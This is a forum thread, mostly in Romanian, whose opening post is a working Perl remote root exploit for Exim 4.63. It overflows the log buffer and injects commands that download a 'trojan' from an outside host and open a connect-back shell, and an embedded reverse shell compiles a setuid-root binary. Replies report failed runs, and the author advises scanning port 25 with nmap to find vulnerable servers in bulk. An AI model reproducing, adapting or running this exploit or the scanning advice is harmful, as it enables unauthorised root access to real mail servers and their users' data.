pyth0n3 Posted December 11, 2010 Report Posted December 11, 2010 #Exim 4.63 (RedHat/Centos/Debian) Remote Root Exploit by Kingcope#Modified perl version of metasploit module=for commentuse this connect back shell as "trojanurl" and be sure to setup a netcat,---snip---$system = '/bin/sh';$ARGC=@ARGV;if ($ARGC!=2) { print "Usage: $0 [Host] [Port] \n\n"; die "Ex: $0 127.0.0.1 2121 \n";}use Socket;use FileHandle;socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";SOCKET->autoflush();open(STDIN, ">&SOCKET");open(STDOUT,">&SOCKET");open(STDERR,">&SOCKET");open FILE, ">/var/spool/exim4/s.c";print FILE qq{#include <stdio.h>#include <unistd.h>int main(int argc, char *argv[]){setuid(0);setgid(0);setgroups(0, NULL);execl("/bin/sh", "sh", NULL);}};close FILE;system("gcc /var/spool/exim4/s.c -o /var/spool/exim4/s; rm /var/spool/exim4/s.c");open FILE, ">/tmp/e.conf";print FILE "spool_directory = \${run{/bin/chown root:root /var/spool/exim4/s}}\${run{/bin/chmod 4755 /var/spool/exim4/s}}";close FILE;system("exim -C/tmp/e.conf -q; rm /tmp/e.conf");system("uname -a;");system("/var/spool/exim4/s");system($system);---snip---=cutuse IO::Socket;if ($#ARGV ne 3) { print "./eximxpl <host/ip> <trojanurl> <yourip> <yourport>\n"; print "example: ./eximxpl utoronto.edu http://www.h4x.net/shell.txt 3.1.33.7 443\n"; exit;}$|=1;$trojan = $ARGV[1];$myip = $ARGV[2];$myport = $ARGV[3];$helohost = "abcde.com";$max_msg = 52428800;my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "25", Proto => 'tcp');while(<$sock>) { print; if ($_ =~ /220 /) { last;}}print $sock "EHLO $helohost\r\n";while(<$sock>) { print; if ($_ =~ /250-SIZE (\d+)/) { $max_msg = $1; print "Set size to $max_msg !\n"; } if ($_ =~ /^250.*Hello ([^\s]+) \[([^\]]+)\]/) { $revdns = $1; $saddr = $2; } if ($_ =~ /250 /) { last;}}if ($revdns eq $helohost) { $vv = "";} else { $vv = $revdns. " ";}$vv .= "(" . $helohost . ")";$from = "root\@local.com";$to = "postmaster\@localhost";$msg_len = $max_msg + 1024*256;$logbuffer_size = 8192;$logbuffer = "YYYY-MM-DD HH:MM:SS XXXXXX-YYYYYY-ZZ rejected from <$from> H=$vv [$saddr]: message too big: read=$msg_len max=$max_msg\n";$logbuffer .= "Envelope-from: <$from>\nEnvelope-to: <$to>\n";$filler = "V" x (8 * 16);$logbuffer_size -= 3;for ($k=0;$k<60;$k++) {if (length($logbuffer) >= $logbuffer_size) {last;}$hdr = sprintf("Header%04d: %s\n", $k, $filler);$newlen = length($logbuffer) + length($hdr);if ($newlen > $logbuffer_size) { $newlen -= $logbuffer_size; $off = length($hdr) - $newlen - 2 - 1; $hdr = substr($hdr, 0, $off); $hdr .= "\n";}$hdrs .= $hdr;$logbuffer .= " " . $hdr;}$hdrx = "HeaderX: ";$k2 = 3;for ($k=1;$k<=200;$k++) { if ($k2 > 12) { $k2 = 3; }# $hdrx .= "\${run{/bin/sh -c 'exec /bin/sh -i <&$k2 >&0 2>&0'}} "; $hdrx .= "\${run{/bin/sh -c \"exec /bin/sh -c 'wget $trojan -O /tmp/c.pl;perl /tmp/c.pl $myip $myport; sleep 10000000'\"}} "; $k2++;}$v = "A" x 255 . "\n";$body = "";while (length($body) < $msg_len) { $body .= $v;}$body = substr($body, 0, $msg_len);print $sock "MAIL FROM: <$from>\r\n";$v = <$sock>;print $v;print $sock "RCPT TO: <$to>\r\n";$v = <$sock>;print $v;print $sock "DATA\r\n";$v = <$sock>;print $v;print "Sending large buffer, please wait...\n";print $sock $hdrs;print $sock $hdrx . "\n";print $sock $body;print $sock "\r\n.\r\n";$v = <$sock>;print $v;print $sock "MAIL FROM: <$from>\r\n";$v = <$sock>;print $v;print $sock "RCPT TO: <$to>\r\n";while(1){};Source:FullDisclosureNote:All debian distribution run exim4 by defaultDebian: 2131-1: exim4: arbitrary code execution 1 Quote
S1ash Posted December 11, 2010 Report Posted December 11, 2010 just tried on centos - it's not work =( 250-SIZE 52428800Set size to 52428800 !250-PIPELINING250-STARTTLS250 HELP250 OK250 Accepted354 Enter message, ending with "." on a line by itselfSending large buffer, please wait...552 Message size exceeds maximum permitted250 OKmaybe because "552 Message size exceeds maximum permitted"?? Quote
The Dev!L Posted December 12, 2010 Report Posted December 12, 2010 he play in his code i mean kingcop and this version is old i think no server have it.just see in line 109 . 110 the Error .with best wishes for all. Quote
PuRiCeL Posted December 15, 2010 Report Posted December 15, 2010 o minunatie de exploit, merge perfect ! +1 Quote
cuteremus Posted December 20, 2010 Report Posted December 20, 2010 ma poate ajuta/ imi poate spune .. cineva cum pot face un scanner din exploitul acesta si.. pe ce port scanez? va rog dati-mi un email la cute.remus [at] yahoo.com Quote
pyth0n3 Posted December 20, 2010 Author Report Posted December 20, 2010 (edited) ma poate ajuta/ imi poate spune .. cineva cum pot face un scanner din exploitul acesta si.. pe ce port scanez? va rog dati-mi un email la cute.remus [at] yahoo.comSe poate scrie un script în oricare limbaj de programare care sa execute un scan de tipul choose random sau range targets pe portul 25 Bineîn?eles va trebui sa fac? ?i un service version detection , dup? care vine creat un filtru in asa fel încît vin salvate doar target-urile care con?in ca banner ( Exim smtpd 4) ?i unde porturile sunt bineîn?eles în open state (op?iunile filtered sau closed nu trebuie sa fie luate în considerare de c?tre filtru creat )P.S. Presupun ca compania în care lucrezi ?i-a cerut asa ceva pt pentesting Edited December 20, 2010 by pyth0n3 Quote
cuteremus Posted December 20, 2010 Report Posted December 20, 2010 mie imi trebuie acel service version detection oare exista un download? sau are cineva? multumesc anticipat. Quote
pyth0n3 Posted December 20, 2010 Author Report Posted December 20, 2010 mie imi trebuie acel service version detection oare exista un download? sau are cineva? multumesc anticipat.man nmap -sV: Probe open ports to determine service/version infoP.S. Presupun ca în compania în care lucrezi folosi?i nmap pt Network Discovery Quote
sTrEs Posted December 28, 2010 Report Posted December 28, 2010 (edited) Se poate scrie un script în oricare limbaj de programare care sa execute un scan de tipul choose random sau range targets pe portul 25 Bineîn?eles va trebui sa fac? ?i un service version detection , dup? care vine creat un filtru in asa fel încît vin salvate doar target-urile care con?in ca banner ( Exim smtpd 4) ?i unde porturile sunt bineîn?eles în open state (op?iunile filtered sau closed nu trebuie sa fie luate în considerare de c?tre filtru creat )P.S. Presupun ca compania în care lucrezi ?i-a cerut asa ceva pt pentestinggood shit, multumim pentru toate informatile. Edited December 29, 2010 by sTrEs Quote
napoletanii Posted December 29, 2010 Report Posted December 29, 2010 ohh sunt foarte multe vulnerabule 130 doar pe o singura clasa a:) Quote
mitzayapa Posted February 2, 2011 Report Posted February 2, 2011 (edited) Careva imi poate face rost de #shell.txt# pe mine ma redirectioneaza pe alta pagina...sau ce`i shell.txt ? iti face sesiune connect back pt firewall/router?ms fain Edited February 2, 2011 by mitzayapa Quote
pyth0n3 Posted February 2, 2011 Author Report Posted February 2, 2011 Careva imi poate face rost de #shell.txt# pe mine ma redirectioneaza pe alta pagina...sau ce`i shell.txt ? iti face sesiune connect back pt firewall/router?ms fainRaspund la subiect :shell.txt este un fisier de text deoarece are extensia .txt , acest fisier are numele de shell in acest caz Oricine poate face rost de un fisier cu numele shell.txt , click dreapta si creezi acest fisier Pentru alte amanunte, si pentru ceea ce vrei sa contina acest fisier esti liber sa pui intrebari , bineinteles daca se poate ia alta sectiune , spre exemplu AJUTOR deoarece aici esti off topic Quote
Zatarra Posted February 2, 2011 Report Posted February 2, 2011 just tried on centos - it's not work =( 250-SIZE 52428800Set size to 52428800 !250-PIPELINING250-STARTTLS250 HELP250 OK250 Accepted354 Enter message, ending with "." on a line by itselfSending large buffer, please wait...552 Message size exceeds maximum permitted250 OKmaybe because "552 Message size exceeds maximum permitted"??Si la mine da exact la fel ;-| Quote
Flubber Posted February 2, 2011 Report Posted February 2, 2011 Si la mine da exact la fel ;-|Probabil din cauza ca:[B]$msg_len = $max_msg + 1024*256;$logbuffer_size = 8192;[/B]$logbuffer = "YYYY-MM-DD HH:MM:SS XXXXXX-YYYYYY-ZZ rejected from <$from> H=$vv [$saddr]: message too big: read=$msg_len max=$max_msg\n";$logbuffer .= "Envelope-from: <$from>\nEnvelope-to: <$to>\n"; Este patchuit si nu poate scrie mai mult decat este nevoie, ceva in genul la BoF. So... Quote